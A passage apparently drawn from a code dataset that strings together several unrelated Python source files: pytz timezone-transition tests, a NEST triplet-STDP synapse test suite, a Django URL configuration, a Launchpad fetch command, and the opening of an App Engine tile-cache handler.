    after = {
        'tzname': 'KMT',
        'utcoffset': timedelta(hours=1, minutes=36), # Really 1:35:36
        'dst': timedelta(0),
    }
class VilniusCESTStartTestCase(USEasternDSTStartTestCase):
    # In 1941, Vilnius changed from MSG to CEST, switching to summer
    # time while simultaneously reducing its UTC offset by two hours,
    # causing the clocks to go backwards for this summer time
    # switchover.
    tzinfo = pytz.timezone('Europe/Vilnius')
    transition_time = datetime(1941, 6, 23, 21, 00, 00, tzinfo=UTC)
    before = {
        'tzname': 'MSK',
        'utcoffset': timedelta(hours=3),
        'dst': timedelta(0),
    }
    after = {
        'tzname': 'CEST',
        'utcoffset': timedelta(hours=2),
        'dst': timedelta(hours=1),
    }
class LondonHistoryStartTestCase(USEasternDSTStartTestCase):
    # The first known timezone transition in London was in 1847 when
    # clocks where synchronized to GMT. However, we currently only
    # understand v1 format tzfile(5) files which does handle years
    # this far in the past, so our earliest known transition is in
    # 1916.
    tzinfo = pytz.timezone('Europe/London')
    # transition_time = datetime(1847, 12, 1, 1, 15, 00, tzinfo=UTC)
    # before = {
    #     'tzname': 'LMT',
    #     'utcoffset': timedelta(minutes=-75),
    #     'dst': timedelta(0),
    #     }
    # after = {
    #     'tzname': 'GMT',
    #     'utcoffset': timedelta(0),
    #     'dst': timedelta(0),
    #     }
    transition_time = datetime(1916, 5, 21, 2, 00, 00, tzinfo=UTC)
    before = {
        'tzname': 'GMT',
        'utcoffset': timedelta(0),
        'dst': timedelta(0),
    }
    after = {
        'tzname': 'BST',
        'utcoffset': timedelta(hours=1),
        'dst': timedelta(hours=1),
    }
class LondonHistoryEndTestCase(USEasternDSTStartTestCase):
    # Timezone switchovers are projected into the future, even
    # though no official statements exist or could be believed even
    # if they did exist. We currently only check the last known
    # transition in 2037, as we are still using v1 format tzfile(5)
    # files.
    tzinfo = pytz.timezone('Europe/London')
    # transition_time = datetime(2499, 10, 25, 1, 0, 0, tzinfo=UTC)
    transition_time = datetime(2037, 10, 25, 1, 0, 0, tzinfo=UTC)
    before = {
        'tzname': 'BST',
        'utcoffset': timedelta(hours=1),
        'dst': timedelta(hours=1),
    }
    after = {
        'tzname': 'GMT',
        'utcoffset': timedelta(0),
        'dst': timedelta(0),
    }
class NoumeaHistoryStartTestCase(USEasternDSTStartTestCase):
    # Noumea adopted a whole hour offset in 1912. Previously
    # it was 11 hours, 5 minutes and 48 seconds off UTC. However,
    # due to limitations of the Python datetime library, we need
    # to round that to 11 hours 6 minutes.
    tzinfo = pytz.timezone('Pacific/Noumea')
    transition_time = datetime(1912, 1, 12, 12, 54, 12, tzinfo=UTC)
    before = {
        'tzname': 'LMT',
        'utcoffset': timedelta(hours=11, minutes=6),
        'dst': timedelta(0),
    }
    after = {
        'tzname': 'NCT',
        'utcoffset': timedelta(hours=11),
        'dst': timedelta(0),
    }
class NoumeaDSTEndTestCase(USEasternDSTStartTestCase):
    # Noumea dropped DST in 1997.
    tzinfo = pytz.timezone('Pacific/Noumea')
    transition_time = datetime(1997, 3, 1, 15, 00, 00, tzinfo=UTC)
    before = {
        'tzname': 'NCST',
        'utcoffset': timedelta(hours=12),
        'dst': timedelta(hours=1),
    }
    after = {
        'tzname': 'NCT',
        'utcoffset': timedelta(hours=11),
        'dst': timedelta(0),
    }
class NoumeaNoMoreDSTTestCase(NoumeaDSTEndTestCase):
    # Noumea dropped DST in 1997. Here we test that it stops occuring.
    # Ten years later both sides of the probed instant expect the same
    # (non-DST) values.
    transition_time = (
        NoumeaDSTEndTestCase.transition_time + timedelta(days=365*10))
    before = NoumeaDSTEndTestCase.after
    after = NoumeaDSTEndTestCase.after
class TahitiTestCase(USEasternDSTStartTestCase):
    # Tahiti has had a single transition in its history.
    tzinfo = pytz.timezone('Pacific/Tahiti')
    transition_time = datetime(1912, 10, 1, 9, 58, 16, tzinfo=UTC)
    before = {
        'tzname': 'LMT',
        'utcoffset': timedelta(hours=-9, minutes=-58),
        'dst': timedelta(0),
    }
    after = {
        'tzname': 'TAHT',
        'utcoffset': timedelta(hours=-10),
        'dst': timedelta(0),
    }
class SamoaInternationalDateLineChange(USEasternDSTStartTestCase):
    # At the end of 2011, Samoa will switch from being east of the
    # international dateline to the west. There will be no Dec 30th
    # 2011 and it will switch from UTC-10 to UTC+14.
    tzinfo = pytz.timezone('Pacific/Apia')
    transition_time = datetime(2011, 12, 30, 10, 0, 0, tzinfo=UTC)
    before = {
        'tzname': 'WSDT',
        'utcoffset': timedelta(hours=-10),
        'dst': timedelta(hours=1),
    }
    after = {
        'tzname': 'WSDT',
        'utcoffset': timedelta(hours=14),
        'dst': timedelta(hours=1),
    }
class ReferenceUSEasternDSTStartTestCase(USEasternDSTStartTestCase):
    """Same DST-start probes, run against Python's reference tzinfo sample."""
    tzinfo = reference.Eastern
    def test_arithmetic(self):
        # Reference implementation cannot handle this
        pass
class ReferenceUSEasternDSTEndTestCase(USEasternDSTEndTestCase):
    """Same DST-end probes against the reference tzinfo, with its known
    one-hour ambiguity at the end of DST accepted as expected output."""
    tzinfo = reference.Eastern
    def testHourBefore(self):
        # Python's datetime library has a bug, where the hour before
        # a daylight savings transition is one hour out. For example,
        # at the end of US/Eastern daylight savings time, 01:00 EST
        # occurs twice (once at 05:00 UTC and once at 06:00 UTC),
        # whereas the first should actually be 01:00 EDT.
        # Note that this bug is by design - by accepting this ambiguity
        # for one hour one hour per year, an is_dst flag on datetime.time
        # became unnecessary.
        self._test_all(
            self.transition_time - timedelta(hours=1), self.after
        )
    def testInstantBefore(self):
        self._test_all(
            self.transition_time - timedelta(seconds=1), self.after
        )
    def test_arithmetic(self):
        # Reference implementation cannot handle this
        pass
class LocalTestCase(unittest.TestCase):
    """Tests of localize()/normalize() behaviour on DstTzInfo zones."""

    def testLocalize(self):
        """localize() must pick the correct historical tzinfo variant."""
        loc_tz = pytz.timezone('Europe/Amsterdam')

        loc_time = loc_tz.localize(datetime(1930, 5, 10, 0, 0, 0))
        # Actually +00:19:32, but Python datetime rounds this
        self.assertEqual(loc_time.strftime('%Z%z'), 'AMT+0020')

        loc_time = loc_tz.localize(datetime(1930, 5, 20, 0, 0, 0))
        # Actually +00:19:32, but Python datetime rounds this
        self.assertEqual(loc_time.strftime('%Z%z'), 'NST+0120')

        loc_time = loc_tz.localize(datetime(1940, 5, 10, 0, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'NET+0020')

        loc_time = loc_tz.localize(datetime(1940, 5, 20, 0, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'CEST+0200')

        loc_time = loc_tz.localize(datetime(2004, 2, 1, 0, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'CET+0100')

        loc_time = loc_tz.localize(datetime(2004, 4, 1, 0, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'CEST+0200')

        # (A dead, unused reassignment of a local 'tz' to the same
        # Europe/Amsterdam zone was removed here.)
        loc_time = loc_tz.localize(datetime(1943, 3, 29, 1, 59, 59))
        self.assertEqual(loc_time.strftime('%Z%z'), 'CET+0100')

        # Switch to US
        loc_tz = pytz.timezone('US/Eastern')

        # End of DST ambiguity check: the repeated wall-clock hour must be
        # resolvable both ways via is_dst, and ambiguous without it.
        loc_time = loc_tz.localize(datetime(1918, 10, 27, 1, 59, 59), is_dst=1)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EDT-0400')

        loc_time = loc_tz.localize(datetime(1918, 10, 27, 1, 59, 59), is_dst=0)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')

        self.assertRaises(pytz.AmbiguousTimeError,
            loc_tz.localize, datetime(1918, 10, 27, 1, 59, 59), is_dst=None
        )

        # Start of DST non-existent times
        loc_time = loc_tz.localize(datetime(1918, 3, 31, 2, 0, 0), is_dst=0)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')

        loc_time = loc_tz.localize(datetime(1918, 3, 31, 2, 0, 0), is_dst=1)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EDT-0400')

        self.assertRaises(pytz.NonExistentTimeError,
            loc_tz.localize, datetime(1918, 3, 31, 2, 0, 0), is_dst=None
        )

        # Weird changes - war time and peace time both is_dst==True
        loc_time = loc_tz.localize(datetime(1942, 2, 9, 3, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'EWT-0400')

        loc_time = loc_tz.localize(datetime(1945, 8, 14, 19, 0, 0))
        self.assertEqual(loc_time.strftime('%Z%z'), 'EPT-0400')

        loc_time = loc_tz.localize(datetime(1945, 9, 30, 1, 0, 0), is_dst=1)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EPT-0400')

        loc_time = loc_tz.localize(datetime(1945, 9, 30, 1, 0, 0), is_dst=0)
        self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')

    def testNormalize(self):
        """normalize() must repair datetimes that drift across a transition."""
        tz = pytz.timezone('US/Eastern')
        dt = datetime(2004, 4, 4, 7, 0, 0, tzinfo=UTC).astimezone(tz)
        dt2 = dt - timedelta(minutes=10)
        self.assertEqual(
            dt2.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
            '2004-04-04 02:50:00 EDT-0400'
        )

        dt2 = tz.normalize(dt2)
        self.assertEqual(
            dt2.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
            '2004-04-04 01:50:00 EST-0500'
        )

    def testPartialMinuteOffsets(self):
        # utcoffset in Amsterdam was not a whole minute until 1937
        # However, we fudge this by rounding them, as the Python
        # datetime library
        tz = pytz.timezone('Europe/Amsterdam')
        utc_dt = datetime(1914, 1, 1, 13, 40, 28, tzinfo=UTC)  # correct
        utc_dt = utc_dt.replace(second=0)  # But we need to fudge it
        loc_dt = utc_dt.astimezone(tz)
        self.assertEqual(
            loc_dt.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
            '1914-01-01 14:00:00 AMT+0020'
        )

        # And get back...
        utc_dt = loc_dt.astimezone(UTC)
        self.assertEqual(
            utc_dt.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
            '1914-01-01 13:40:00 UTC+0000'
        )

    def no_testCreateLocaltime(self):
        # It would be nice if this worked, but it doesn't.
        tz = pytz.timezone('Europe/Amsterdam')
        dt = datetime(2004, 10, 31, 2, 0, 0, tzinfo=tz)
        self.assertEqual(
            dt.strftime(fmt),
            '2004-10-31 02:00:00 CET+0100'
        )
class CommonTimezonesTestCase(unittest.TestCase):
    """Membership checks on pytz.common_timezones / all_timezones sets."""
    def test_bratislava(self):
        # Bratislava is the default timezone for Slovakia, but our
        # heuristics where not adding it to common_timezones. Ideally,
        # common_timezones should be populated from zone.tab at runtime,
        # but I'm hesitant to pay the startup cost as loading the list
        # on demand whilst remaining backwards compatible seems
        # difficult.
        self.assertTrue('Europe/Bratislava' in pytz.common_timezones)
        self.assertTrue('Europe/Bratislava' in pytz.common_timezones_set)
    def test_us_eastern(self):
        self.assertTrue('US/Eastern' in pytz.common_timezones)
        self.assertTrue('US/Eastern' in pytz.common_timezones_set)
    def test_belfast(self):
        # Belfast uses London time.
        self.assertTrue('Europe/Belfast' in pytz.all_timezones_set)
        self.assertFalse('Europe/Belfast' in pytz.common_timezones)
        self.assertFalse('Europe/Belfast' in pytz.common_timezones_set)
class BaseTzInfoTestCase:
    '''Ensure UTC, StaticTzInfo and DstTzInfo work consistently.
    These tests are run for each type of tzinfo.
    '''
    tz = None # override
    tz_class = None # override
    def test_expectedclass(self):
        self.assertTrue(isinstance(self.tz, self.tz_class))
    def test_fromutc(self):
        # naive datetime.
        dt1 = datetime(2011, 10, 31)
        # localized datetime, same timezone.
        dt2 = self.tz.localize(dt1)
        # Both should give the same results. Note that the standard
        # Python tzinfo.fromutc() only supports the second.
        for dt in [dt1, dt2]:
            loc_dt = self.tz.fromutc(dt)
            loc_dt2 = pytz.utc.localize(dt1).astimezone(self.tz)
            self.assertEqual(loc_dt, loc_dt2)
        # localized datetime, different timezone.
        new_tz = pytz.timezone('Europe/Paris')
        self.assertTrue(self.tz is not new_tz)
        dt3 = new_tz.localize(dt1)
        self.assertRaises(ValueError, self.tz.fromutc, dt3)
    def test_normalize(self):
        # Normalizing a datetime from a different zone must re-attach
        # this zone's tzinfo and shift the wall-clock value accordingly.
        other_tz = pytz.timezone('Europe/Paris')
        self.assertTrue(self.tz is not other_tz)
        dt = datetime(2012, 3, 26, 12, 0)
        other_dt = other_tz.localize(dt)
        local_dt = self.tz.normalize(other_dt)
        self.assertTrue(local_dt.tzinfo is not other_dt.tzinfo)
        self.assertNotEqual(
            local_dt.replace(tzinfo=None), other_dt.replace(tzinfo=None))
    def test_astimezone(self):
        # astimezone() must behave like normalize() for cross-zone input.
        other_tz = pytz.timezone('Europe/Paris')
        self.assertTrue(self.tz is not other_tz)
        dt = datetime(2012, 3, 26, 12, 0)
        other_dt = other_tz.localize(dt)
        local_dt = other_dt.astimezone(self.tz)
        self.assertTrue(local_dt.tzinfo is not other_dt.tzinfo)
        self.assertNotEqual(
            local_dt.replace(tzinfo=None), other_dt.replace(tzinfo=None))
class OptimizedUTCTestCase(unittest.TestCase, BaseTzInfoTestCase):
    # pytz's own UTC singleton.
    tz = pytz.utc
    tz_class = tz.__class__
class LegacyUTCTestCase(unittest.TestCase, BaseTzInfoTestCase):
    # Deprecated timezone, but useful for comparison tests.
    tz = pytz.timezone('Etc/UTC')
    tz_class = StaticTzInfo
class StaticTzInfoTestCase(unittest.TestCase, BaseTzInfoTestCase):
    # Fixed-offset zone exercising the StaticTzInfo code path.
    tz = pytz.timezone('GMT')
    tz_class = StaticTzInfo
class DstTzInfoTestCase(unittest.TestCase, BaseTzInfoTestCase):
    # DST-observing zone exercising the DstTzInfo code path.
    tz = pytz.timezone('Australia/Melbourne')
    tz_class = DstTzInfo
def test_suite():
    """Collect pytz's doctests plus every TestCase in this module."""
    suite = unittest.TestSuite()
    suite.addTest(doctest.DocTestSuite('pytz'))
    suite.addTest(doctest.DocTestSuite('pytz.tzinfo'))
    import test_tzinfo
    suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_tzinfo))
    return suite
if __name__ == '__main__':
    warnings.simplefilter("error") # Warnings should be fatal in tests.
    unittest.main(defaultTest='test_suite')
| lthurlow/Network-Grapher | proj/external/matplotlib-1.2.1/lib/pytz/tests/test_tzinfo.py | Python | mit | 28,136 |
from tg.configuration.utils import get_partial_dict
class Bunch(dict):
    """A dictionary whose items can also be read, written and deleted
    as attributes (``b.key`` behaves like ``b['key']``)."""

    def __getitem__(self, key):
        # Plain mapping lookup, delegated straight to dict.
        return dict.__getitem__(self, key)

    def __getattr__(self, name):
        # Invoked only when normal attribute lookup fails: serve the
        # matching item if present, otherwise fall back to
        # get_partial_dict for namespaced keys.
        if name in self:
            return self[name]
        return get_partial_dict(name, self, Bunch)

    # Attribute assignment simply stores a mapping item.
    __setattr__ = dict.__setitem__

    def __delattr__(self, name):
        # Deleting an unknown attribute raises AttributeError, matching
        # normal object semantics rather than the mapping's KeyError.
        if name not in self:
            raise AttributeError(name)
        dict.__delitem__(self, name)
from .. import db
from .. import lp
def get_command():
    """Factory used by the command registry: build a fresh Command."""
    return Command()


class Command(object):
    """Fetch blueprints from Launchpad and store them in a local db file."""
    name = 'fetch'
    help = ('Download all valid blueprints from launchpad for projects '
            'and save in a local file.')

    def add_arguments(self, parser):
        """Register CLI arguments: one or more project names plus the
        target database file (defaults to '.hoke-db')."""
        parser.add_argument('projects', nargs='+', metavar='project')
        parser.add_argument('--file', default='.hoke-db')

    def execute(self, args):
        """Download every blueprint of every requested project and add
        it to the local database.

        The database is closed in a ``finally`` block so the handle no
        longer leaks when Launchpad access fails part-way through.
        """
        hoke_db = db.new_db(args.file)
        try:
            launchpad = lp.new_connection()
            for project in args.projects:
                lp_project = launchpad.get_project(project)
                for bp in lp_project.get_blueprints():
                    hoke_db.add_blueprint(bp)
        finally:
            hoke_db.close()
| markwash/hoke | hoke/commands/fetch.py | Python | bsd-2-clause | 721 |
from django.conf.urls import url
from .import views
#url(r'^view/(?P<article_id>[0-9]+)/$',views.view,name='view'),
# URL routes for the EMS app; each route name matches its view function.
urlpatterns=[
    url(r'^$', views.index, name='index'),
    # session handling
    url(r'^login/$', views.login, name='login'),
    url(r'^logout/$', views.logout, name='logout'),
    # device management
    url(r'^dev/add/$', views.dev_add, name='dev_add'),
    url(r'^dev/edit/(?P<id>[0-9]+)/$', views.dev_edit, name='dev_edit'),
    url(r'^dev/control/$', views.dev_control, name='dev_control'),
    url(r'^dev/del/(?P<id>[0-9]+)/$', views.dev_del, name='dev_del'),
    # user-group management
    url(r'^usergroup/add/$', views.usgp_add, name='usgp_add'),
    url(r'^usergroup/edit/(?P<id>[0-9]+)/$', views.usgp_edit, name='usgp_edit'),
    url(r'^usergroup/del/(?P<id>[0-9]+)/$', views.usgp_del, name='usgp_del'),
    # user management
    url(r'^user/add/(?P<id>[0-9]+)/$', views.user_add, name='user_add'),
    url(r'^user/edit/(?P<id>[0-9]+)/$', views.user_edit, name='user_edit'),
    url(r'^user/del/(?P<id>[0-9]+)/$', views.user_del, name='user_del'),
    url(r'^user/self/$', views.self, name='self'),
    # data views: history, warnings, control actions
    url(r'^data/history/(?P<id>.*)/$', views.data_history, name='data_history'),
    url(r'^data/history/$', views.data_history, name='data_history'),
    url(r'^data/warning/$', views.data_warning, name='data_warning'),
    url(r'^data/control/(?P<action>.*)/$', views.data_control, name='data_control'),
    # machine-facing endpoints
    url(r'^api/$',views.api,name='api'),
    url(r'^ajax/$',views.ajax,name='ajax')
]
| zerovip/EMS | 环境监测系统/django/EMS/emsys/urls.py | Python | apache-2.0 | 1,465 |
# -*- coding: utf-8 -*-
#
# test_stdp_triplet_synapse.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the stdp_triplet_synapse in NEST.
import nest
import unittest
from math import exp
@nest.check_stack
class STDPTripletConnectionTestCase(unittest.TestCase):
    """Check stdp_triplet_connection model properties.

    Each test re-computes the expected trace/weight evolution in pure
    Python (decay/facilitate/depress) and compares it against the values
    reported by the NEST synapse after simulation.
    """
    def setUp(self):
        # Build a minimal pre -> post parrot-neuron circuit joined by one
        # triplet-STDP synapse; parrot neurons simply relay injected spikes.
        nest.set_verbosity('M_WARNING')
        nest.ResetKernel()
        # settings
        self.dendritic_delay = 1.0
        self.decay_duration = 5.0
        self.synapse_model = "stdp_triplet_synapse"
        self.syn_spec = {
            "model": self.synapse_model,
            "delay": self.dendritic_delay,
            "receptor_type": 1, # set receptor 1 post-synaptically, to not generate extra spikes
            "weight": 5.0,
            "tau_plus": 16.8,
            "tau_plus_triplet": 101.0,
            "Aplus": 0.1,
            "Aminus": 0.1,
            "Aplus_triplet": 0.1,
            "Aminus_triplet": 0.1,
            "Kplus": 0.0,
            "Kplus_triplet": 0.0,
            "Wmax": 100.0,
        }
        self.post_neuron_params = {
            "tau_minus": 33.7,
            "tau_minus_triplet": 125.0,
        }
        # setup basic circuit
        self.pre_neuron = nest.Create("parrot_neuron")
        self.post_neuron = nest.Create("parrot_neuron", 1, params=self.post_neuron_params)
        nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=self.syn_spec)
    def generateSpikes(self, neuron, times):
        """Trigger spike to given neuron at specified times."""
        # The generator-to-neuron delay is subtracted from the requested
        # times so the spikes arrive at `neuron` exactly at `times`.
        delay = 1.
        gen = nest.Create("spike_generator", 1, {"spike_times": [t-delay for t in times]})
        nest.Connect(gen, neuron, syn_spec={"delay": delay})
    def status(self, which):
        """Get synapse parameter status."""
        stats = nest.GetConnections(self.pre_neuron, synapse_model=self.synapse_model)
        return nest.GetStatus(stats, [which])[0][0]
    def decay(self, time, Kplus, Kplus_triplet, Kminus, Kminus_triplet):
        """Decay variables."""
        # Each STDP trace decays exponentially with its own time constant.
        Kplus *= exp(- time / self.syn_spec["tau_plus"])
        Kplus_triplet *= exp(- time / self.syn_spec["tau_plus_triplet"])
        Kminus *= exp(- time / self.post_neuron_params["tau_minus"])
        Kminus_triplet *= exp(- time / self.post_neuron_params["tau_minus_triplet"])
        return (Kplus, Kplus_triplet, Kminus, Kminus_triplet)
    def facilitate(self, w, Kplus, Kminus_triplet):
        """Facilitate weight."""
        # w -> w + Kplus * (Aplus + Aplus_triplet * Kminus_triplet)
        return w + Kplus * (self.syn_spec["Aplus"] + self.syn_spec["Aplus_triplet"] * Kminus_triplet)
    def depress(self, w, Kminus, Kplus_triplet):
        """Depress weight."""
        # w -> w - Kminus * (Aminus + Aminus_triplet * Kplus_triplet)
        return w - Kminus * (self.syn_spec["Aminus"] + self.syn_spec["Aminus_triplet"] * Kplus_triplet)
    def assertAlmostEqualDetailed(self, expected, given, message):
        """Improve assertAlmostEqual with detailed message."""
        # NOTE(review): the format string is missing its closing parenthesis
        # after the second `%s` -- cosmetic only, kept as-is.
        messageWithValues = "%s (expected: `%s` was: `%s`" % (message, str(expected), str(given))
        self.assertAlmostEqual(given, expected, msg=messageWithValues)
    def test_badPropertiesSetupsThrowExceptions(self):
        """Check that exceptions are thrown when setting bad parameters."""
        def setupProperty(property):
            bad_syn_spec = self.syn_spec.copy()
            bad_syn_spec.update(property)
            nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=bad_syn_spec)
        def badPropertyWith(content, parameters):
            # assertRaisesRegexp is the Python 2 spelling of assertRaisesRegex.
            self.assertRaisesRegexp(nest.NESTError, "BadProperty(.+)" + content, setupProperty, parameters)
        # Negative trace values are invalid.
        badPropertyWith("Kplus", {"Kplus": -1.0})
        badPropertyWith("Kplus_triplet", {"Kplus_triplet": -1.0})
    def test_varsZeroAtStart(self):
        """Check that pre and post-synaptic variables are zero at start."""
        self.assertAlmostEqualDetailed(0.0, self.status("Kplus"), "Kplus should be zero")
        self.assertAlmostEqualDetailed(0.0, self.status("Kplus_triplet"), "Kplus_triplet should be zero")
    def test_preVarsIncreaseWithPreSpike(self):
        """Check that pre-synaptic variables (Kplus, Kplus_triplet) increase after each pre-synaptic spike."""
        self.generateSpikes(self.pre_neuron, [2.0])
        Kplus = self.status("Kplus")
        Kplus_triplet = self.status("Kplus_triplet")
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(Kplus + 1.0, self.status("Kplus"), "Kplus should have increased by 1")
        self.assertAlmostEqualDetailed(Kplus_triplet + 1.0, self.status("Kplus_triplet"),
                                       "Kplus_triplet should have increased by 1")
    def test_preVarsDecayAfterPreSpike(self):
        """Check that pre-synaptic variables (Kplus, Kplus_triplet) decay after each pre-synaptic spike."""
        self.generateSpikes(self.pre_neuron, [2.0])
        # Synapse state is only updated on pre-synaptic spikes, so a second
        # spike is needed to trigger the computation.
        self.generateSpikes(self.pre_neuron, [2.0 + self.decay_duration]) # trigger computation
        (Kplus, Kplus_triplet, _, _) = self.decay(self.decay_duration, 1.0, 1.0, 0.0, 0.0)
        Kplus += 1.0
        Kplus_triplet += 1.0
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(Kplus, self.status("Kplus"), "Kplus should have decay")
        self.assertAlmostEqualDetailed(Kplus_triplet, self.status("Kplus_triplet"), "Kplus_triplet should have decay")
    def test_preVarsDecayAfterPostSpike(self):
        """Check that pre-synaptic variables (Kplus, Kplus_triplet) decay after each post-synaptic spike."""
        self.generateSpikes(self.pre_neuron, [2.0])
        # Intervening post-synaptic spikes must not alter the pre-synaptic traces.
        self.generateSpikes(self.post_neuron, [3.0, 4.0])
        self.generateSpikes(self.pre_neuron, [2.0 + self.decay_duration]) # trigger computation
        (Kplus, Kplus_triplet, _, _) = self.decay(self.decay_duration, 1.0, 1.0, 0.0, 0.0)
        Kplus += 1.0
        Kplus_triplet += 1.0
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(Kplus, self.status("Kplus"), "Kplus should have decay")
        self.assertAlmostEqualDetailed(Kplus_triplet, self.status("Kplus_triplet"), "Kplus_triplet should have decay")
    def test_weightChangeWhenPrePostSpikes(self):
        """Check that weight changes whenever a pre-post spike pair happen."""
        self.generateSpikes(self.pre_neuron, [2.0])
        self.generateSpikes(self.post_neuron, [4.0])
        self.generateSpikes(self.pre_neuron, [6.0]) # trigger computation
        Kplus = self.status("Kplus")
        Kplus_triplet = self.status("Kplus_triplet")
        Kminus = 0.0
        Kminus_triplet = 0.0
        weight = self.status("weight")
        # Pre spike at 2.0: depress with current post traces, then bump pre traces.
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
        weight = self.depress(weight, Kminus, Kplus_triplet)
        Kplus += 1.0
        Kplus_triplet += 1.0
        # Post spike seen at the synapse at 4.0 + dendritic delay: facilitate,
        # then bump post traces.
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 + self.dendritic_delay, Kplus, Kplus_triplet,
                                                                    Kminus, Kminus_triplet)
        weight = self.facilitate(weight, Kplus, Kminus_triplet)
        Kminus += 1.0
        Kminus_triplet += 1.0
        # Second pre spike at 6.0: depress again.
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 - self.dendritic_delay, Kplus, Kplus_triplet,
                                                                    Kminus, Kminus_triplet)
        weight = self.depress(weight, Kminus, Kplus_triplet)
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(weight, self.status("weight"), "weight should have decreased")
    def test_weightChangeWhenPrePostPreSpikes(self):
        """Check that weight changes whenever a pre-post-pre spike triplet happen."""
        self.generateSpikes(self.pre_neuron, [2.0, 6.0])
        self.generateSpikes(self.post_neuron, [4.0])
        self.generateSpikes(self.pre_neuron, [8.0]) # trigger computation
        Kplus = self.status("Kplus")
        Kplus_triplet = self.status("Kplus_triplet")
        Kminus = 0.0
        Kminus_triplet = 0.0
        weight = self.status("weight")
        # Same bookkeeping as the pair test, with one extra pre spike at 6.0.
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
        weight = self.depress(weight, Kminus, Kplus_triplet)
        Kplus += 1.0
        Kplus_triplet += 1.0
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 + self.dendritic_delay, Kplus, Kplus_triplet,
                                                                    Kminus, Kminus_triplet)
        weight = self.facilitate(weight, Kplus, Kminus_triplet)
        Kminus += 1.0
        Kminus_triplet += 1.0
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 - self.dendritic_delay, Kplus, Kplus_triplet,
                                                                    Kminus, Kminus_triplet)
        weight = self.depress(weight, Kminus, Kplus_triplet)
        Kplus += 1.0
        Kplus_triplet += 1.0
        (Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
        weight = self.depress(weight, Kminus, Kplus_triplet)
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(weight, self.status("weight"), "weight should have decreased")
    def test_maxWeightStaturatesWeight(self):
        """Check that setting maximum weight property keep weight limited."""
        # Add a second synapse whose Wmax barely exceeds the current weight,
        # so any facilitation must saturate at Wmax.
        limited_weight = self.status("weight") + 1e-10
        limited_syn_spec = self.syn_spec.copy()
        limited_syn_spec.update({"Wmax": limited_weight })
        nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=limited_syn_spec)
        self.generateSpikes(self.pre_neuron, [2.0])
        self.generateSpikes(self.pre_neuron, [3.0]) # trigger computation
        nest.Simulate(20.0)
        self.assertAlmostEqualDetailed(limited_weight, self.status("weight"), "weight should have been limited")
def suite():
    """Collect every test* method of STDPTripletConnectionTestCase into a suite."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromTestCase(STDPTripletConnectionTestCase)
def run():
    """Execute the whole test suite with a verbose text runner."""
    unittest.TextTestRunner(verbosity=2).run(suite())
# Allow the test module to be executed directly as a script.
if __name__ == "__main__":
    run()
| magnastrazh/NEUCOGAR | nest/serotonin/research/C/nest-2.10.0/pynest/nest/tests/test_stdp_triplet_synapse.py | Python | gpl-2.0 | 10,707 |
"""This module contains a tile cache handler."""
__author__ = 'Aaron Steele'
# MOL imports
import cache
# Standard Python imports
import hashlib
import logging
import os
import urllib
import webapp2
# Google App Engine imports
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext.webapp.util import run_wsgi_app
# Detect whether we run on production App Engine or the local dev server:
# in the dev server SERVER_SOFTWARE starts with "Development".
if 'SERVER_SOFTWARE' in os.environ:
    PROD = not os.environ['SERVER_SOFTWARE'].startswith('Development')
else:
    PROD = True

# Application id is the part of CURRENT_VERSION_ID before the first dot.
app_id = os.environ['CURRENT_VERSION_ID'].split('.')[0]

if PROD:
    host_prefix = 'http'
    # CGI/WSGI environ values are strings, so SERVER_PORT must be compared
    # against the string '443'; comparing to the int 443 was always False,
    # which made production hosts never use https.
    if os.environ['SERVER_PORT'] == '443':
        host_prefix = 'https'
    app_host = host_prefix + '://' + os.environ['SERVER_NAME']
else:
    app_host = 'http://localhost:8080'
class TileHandler(webapp2.RequestHandler):
    """Serves map tile PNGs through a two-level (memcache + datastore) cache."""

    def get(self):
        """Return the requested tile, falling back to CartoDB on a cache miss."""
        # Rewrite the incoming URL so it points at the CartoDB tile server.
        source_url = self.request.url.replace(app_host, 'http://mol.cartodb.com')
        cache_key = 'tile-%s' % hashlib.sha224(source_url).hexdigest()
